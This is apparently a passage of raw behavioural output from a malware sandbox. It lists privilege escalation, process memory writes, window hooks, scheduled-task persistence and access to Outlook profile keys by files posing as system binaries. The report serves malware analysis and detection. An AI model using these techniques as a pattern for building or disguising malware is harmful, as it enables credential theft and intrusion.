N/A N/A C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe N/A
N/A N/A C:\Windows\SysWOW64\systray.exe N/A
N/A N/A C:\Windows\SysWOW64\systray.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\2023-09-04\7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\systray.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\2023-09-04\689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2784 wrote to memory of 2180 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2784 wrote to memory of 2180 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2784 wrote to memory of 2180 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 3280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2180 wrote to memory of 4532 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

outlook_win_path

Description Indicator Process Target
